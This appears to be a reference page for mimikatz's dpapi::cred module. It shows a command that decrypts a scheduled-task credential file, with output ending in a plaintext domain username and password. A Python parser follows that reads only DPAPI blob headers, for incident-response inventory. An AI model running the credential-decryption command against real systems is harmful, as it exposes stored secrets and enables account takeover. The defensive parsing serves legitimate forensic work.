cred
dpapi::cred decrypts DPAPI-protected saved credentials such as RDP and scheduled task credentials (cf. dumping DPAPI secrets). It has the following command line arguments:
The following example is taken from Benjamin's "howto ~ scheduled tasks credentials" guide and displays the content of a credential file:
```
mimikatz # dpapi::cred /in:%systemroot%\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\AA10EB8126AA20883E9542812A0F904C
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {5d4e7e0d-d922-4783-8efc-9319b45b1c9a}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000046 - 70
szDescription : Données d’identification locales
[...]
Decrypting Credential:
* volatile cache: GUID:{5d4e7e0d-d922-4783-8efc-9319b45b1c9a};KeyHash:ba02ef86f26c683858d3df3dc961e37b0d47e574
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000fe - 254
credUnk0 : 00004004 - 16388

Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 03/01/2017 21:31:30
unkFlagsOrSize : 00000018 - 24
Persist : 00000002 - 2 - local_machine
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:batch=TaskScheduler:Task:{813565C4-C976-4E78-A1CA-8BDAE749E965}
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : LAB\\admin
CredentialBlob : waza1234/a
Attributes : 0
```
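The **BLOB** section above is the plaintext header every DPAPI blob carries before its ciphertext, and it is what a responder reads to inventory which credential files on a host depend on which master key, without decrypting anything. The parser below is an added example, not mimikatz code: it unpacks the header fields the output prints before `[...]` (dwVersion, guidProvider, dwMasterKeyVersion, guidMasterKey, dwFlags, dwDescriptionLen, szDescription), checks the provider GUID, and reports where the rest of the blob (algorithm ids, salt, ciphertext, signature) begins. The `FLAG_NAMES` table maps the CRYPTPROTECT_* bits from wincrypt.h; the sample blob is constructed from the GUIDs shown above, while its description length and trailing body are made up for the test.

```python
import struct
import uuid

# Provider GUID present in every DPAPI blob (the guidProvider value in the output above).
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")

# dwFlags bits, from the CRYPTPROTECT_* constants in wincrypt.h.
FLAG_NAMES = {
    0x00000004: "local_machine",
    0x20000000: "system",
}


def flag_names(dw_flags):
    """Name the set dwFlags bits, e.g. 0x20000000 -> ['system']."""
    return [name for bit, name in sorted(FLAG_NAMES.items()) if dw_flags & bit]


def parse_dpapi_blob_header(blob):
    """Parse the header fields mimikatz prints before '[...]'.

    Layout (integers little-endian, GUIDs in Windows mixed-endian form):
      DWORD dwVersion
      GUID  guidProvider
      DWORD dwMasterKeyVersion
      GUID  guidMasterKey
      DWORD dwFlags
      DWORD dwDescriptionLen   (byte length of szDescription, including its UTF-16 NUL)
      WCHAR szDescription[]
    The algorithm ids, salt, ciphertext and signature follow and are not parsed here.
    """
    fixed = struct.Struct("<I16sI16sII")
    if len(blob) < fixed.size:
        raise ValueError("blob shorter than the fixed DPAPI header")
    version, provider_raw, mk_version, mk_raw, flags, desc_len = fixed.unpack_from(blob, 0)
    provider = uuid.UUID(bytes_le=provider_raw)  # bytes_le matches the Windows GUID layout
    if provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob: unexpected guidProvider %s" % provider)
    end = fixed.size + desc_len
    if desc_len % 2 or end > len(blob):
        raise ValueError("dwDescriptionLen %d inconsistent with blob size %d" % (desc_len, len(blob)))
    description = blob[fixed.size:end].decode("utf-16-le").rstrip("\x00")
    return {
        "dwVersion": version,
        "guidProvider": provider,
        "dwMasterKeyVersion": mk_version,
        "guidMasterKey": uuid.UUID(bytes_le=mk_raw),
        "dwFlags": flags,
        "flags": flag_names(flags),
        "dwDescriptionLen": desc_len,
        "szDescription": description,
        "body_offset": end,  # offset of the first field after the header (algCrypt)
    }


def build_sample_blob(master_key_guid, flags, description, body=b""):
    """Constructed sample for testing: a header in the layout above plus an opaque body."""
    desc = description.encode("utf-16-le") + b"\x00\x00"
    header = struct.pack("<I16sI16sII", 1, DPAPI_PROVIDER_GUID.bytes_le, 1,
                         uuid.UUID(master_key_guid).bytes_le, flags, len(desc))
    return header + desc + body


if __name__ == "__main__":
    # Constructed blob using the master key GUID and flags from the output above.
    sample = build_sample_blob("5d4e7e0d-d922-4783-8efc-9319b45b1c9a", 0x20000000,
                               "Données d’identification locales", body=b"\x00" * 8)
    for key, value in parse_dpapi_blob_header(sample).items():
        print("%-20s: %s" % (key, value))
```

Run over the files under a profile's `AppData\Local\Microsoft\Credentials` (or the `systemprofile` path used in the example), the `guidMasterKey` field tells you which master key file each credential depends on and the `system` flag whether it was protected in the SYSTEM context, which is what distinguishes scheduled-task credentials from a user's own saved logons when scoping an exposure.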